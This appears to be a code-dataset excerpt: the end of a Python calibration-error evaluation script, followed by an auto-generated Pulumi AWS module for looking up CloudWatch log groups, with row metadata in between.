verbose = options.verbose
adaptive = True
exp = options.exp
mae_vals = []
acc_vals = []
for infile in infiles:
acc, mae = eval_calibration_file(infile, n_bins=n_bins, adaptive=adaptive, verbose=verbose, exp=exp)
print(infile, "ACC = {:.5f}".format(acc))
print(infile, "MAE = {:.5f}".format(mae))
mae_vals.append(mae)
acc_vals.append(acc)
print("Mean ACC = {:.5f} ({:.5f})".format(np.mean(acc_vals), np.std(acc_vals)))
print("Mean MAE = {:.5f} ({:.5f})".format(np.mean(mae_vals), np.std(mae_vals)))
def eval_calibration_file(infile, n_bins=10, adaptive=True, verbose=False, exp=False):
data = np.load(infile)
labels = data['labels']
pred_probs = data['pred_probs']
if exp:
pred_probs = np.exp(pred_probs)
n_items, n_classes = pred_probs.shape
# scatter the labels
if len(labels.shape) == 1 or labels.shape[1] == 1:
temp = np.zeros((n_items, n_classes), dtype=int)
temp[np.arange(n_items), labels] = 1
labels = temp
mae = eval_calibration(labels, pred_probs, n_bins, adaptive, verbose)
acc = np.sum(labels.argmax(axis=1) == pred_probs.argmax(axis=1)) / float(n_items)
return acc, mae
def eval_calibration(label_matrix, pred_probs, n_bins=10, adaptive=True, verbose=False):
n_items, n_classes = label_matrix.shape
if n_classes > 2:
mae = 0.0
for c in range(n_classes):
if verbose:
print("Class {:d}".format(c))
mae += eval_calibration_by_class(label_matrix, pred_probs, col=c, n_bins=n_bins, adaptive=adaptive, verbose=verbose) / n_bins
else:
mae = eval_calibration_by_class(label_matrix, pred_probs, col=0, n_bins=n_bins, adaptive=adaptive, verbose=verbose)
return mae
def eval_calibration_by_class(labels, pred_probs, col=0, n_bins=10, adaptive=True, verbose=False):
n_items, n_classes = pred_probs.shape
order = np.argsort(pred_probs[:, col])
bin_size = n_items // n_bins
counts = []
lower_vals = []
label_means = []
probs_means = []
ae_vals = []
mae = 0.0
for i in range(n_bins):
if adaptive:
if i < n_bins-1:
indices = order[i * bin_size:(i+1) * bin_size]
else:
indices = order[i * bin_size:]
#probs = [pred_probs[index, col] for index in indices]
#lower = np.min(probs)
lower = np.min(pred_probs[indices, col])
counts.append(len(indices))
else:
lower = 1.0 / n_bins * i
upper = 1.0 / n_bins * (i+1)
if i < n_bins - 1:
indices = (pred_probs[:, col] >= lower) * (pred_probs[:, col] < upper)
else:
indices = (pred_probs[:, col] >= lower)
counts.append(indices.sum())
mean_probs = pred_probs[indices, col].mean()
mean_label = labels[indices, col].mean()
ae = np.abs(mean_probs - mean_label)
mae += ae
lower_vals.append(lower)
label_means.append(mean_label)
probs_means.append(mean_probs)
ae_vals.append(ae)
if verbose:
print('Bins:\t' + '\t'.join(['{:.3f}'.format(low) for low in lower_vals]))
print('Count:\t' + '\t'.join(['{:d}'.format(val) for val in counts]))
print('True:\t' + '\t'.join(['{:.3f}'.format(val) for val in label_means]))
print('Pred:\t' + '\t'.join(['{:.3f}'.format(val) for val in probs_means]))
print('AE:\t' + '\t'.join(['{:.3f}'.format(val) for val in ae_vals]))
return mae / n_bins
if __name__ == '__main__':
main()
| 34.21875
| 137
| 0.59589
|
3d6ee95973024ea6f79c10ef6c0e2d10f47f91b1
| 5,884
|
py
|
Python
|
sdk/python/pulumi_aws/cloudwatch/get_log_group.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/cloudwatch/get_log_group.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/cloudwatch/get_log_group.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'GetLogGroupResult',
'AwaitableGetLogGroupResult',
'get_log_group',
'get_log_group_output',
]
@pulumi.output_type
class GetLogGroupResult:
"""
A collection of values returned by getLogGroup.
"""
def __init__(__self__, arn=None, creation_time=None, id=None, kms_key_id=None, name=None, retention_in_days=None, tags=None):
if arn and not isinstance(arn, str):
raise TypeError("Expected argument 'arn' to be a str")
pulumi.set(__self__, "arn", arn)
if creation_time and not isinstance(creation_time, int):
raise TypeError("Expected argument 'creation_time' to be a int")
pulumi.set(__self__, "creation_time", creation_time)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if kms_key_id and not isinstance(kms_key_id, str):
raise TypeError("Expected argument 'kms_key_id' to be a str")
pulumi.set(__self__, "kms_key_id", kms_key_id)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if retention_in_days and not isinstance(retention_in_days, int):
raise TypeError("Expected argument 'retention_in_days' to be a int")
pulumi.set(__self__, "retention_in_days", retention_in_days)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter
def arn(self) -> str:
"""
The ARN of the Cloudwatch log group. Any `:*` suffix added by the API, denoting all CloudWatch Log Streams under the CloudWatch Log Group, is removed for greater compatibility with other AWS services that do not accept the suffix.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="creationTime")
def creation_time(self) -> int:
"""
The creation time of the log group, expressed as the number of milliseconds after Jan 1, 1970 00:00:00 UTC.
"""
return pulumi.get(self, "creation_time")
@property
@pulumi.getter
def id(self) -> str:
"""
The provider-assigned unique ID for this managed resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="kmsKeyId")
def kms_key_id(self) -> str:
"""
The ARN of the KMS Key to use when encrypting log data.
"""
return pulumi.get(self, "kms_key_id")
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
@property
@pulumi.getter(name="retentionInDays")
def retention_in_days(self) -> int:
"""
The number of days log events retained in the specified log group.
"""
return pulumi.get(self, "retention_in_days")
@property
@pulumi.getter
def tags(self) -> Mapping[str, str]:
"""
A map of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
class AwaitableGetLogGroupResult(GetLogGroupResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetLogGroupResult(
arn=self.arn,
creation_time=self.creation_time,
id=self.id,
kms_key_id=self.kms_key_id,
name=self.name,
retention_in_days=self.retention_in_days,
tags=self.tags)
def get_log_group(name: Optional[str] = None,
tags: Optional[Mapping[str, str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetLogGroupResult:
"""
Use this data source to get information about an AWS Cloudwatch Log Group
## Example Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.cloudwatch.get_log_group(name="MyImportantLogs")
```
:param str name: The name of the Cloudwatch log group
:param Mapping[str, str] tags: A map of tags to assign to the resource.
"""
__args__ = dict()
__args__['name'] = name
__args__['tags'] = tags
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('aws:cloudwatch/getLogGroup:getLogGroup', __args__, opts=opts, typ=GetLogGroupResult).value
return AwaitableGetLogGroupResult(
arn=__ret__.arn,
creation_time=__ret__.creation_time,
id=__ret__.id,
kms_key_id=__ret__.kms_key_id,
name=__ret__.name,
retention_in_days=__ret__.retention_in_days,
tags=__ret__.tags)
@_utilities.lift_output_func(get_log_group)
def get_log_group_output(name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Optional[Mapping[str, str]]]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetLogGroupResult]:
"""
Use this data source to get information about an AWS Cloudwatch Log Group
## Example Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.cloudwatch.get_log_group(name="MyImportantLogs")
```
:param str name: The name of the Cloudwatch log group
:param Mapping[str, str] tags: A map of tags to assign to the resource.
"""
...
| 33.816092
| 238
| 0.64446
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.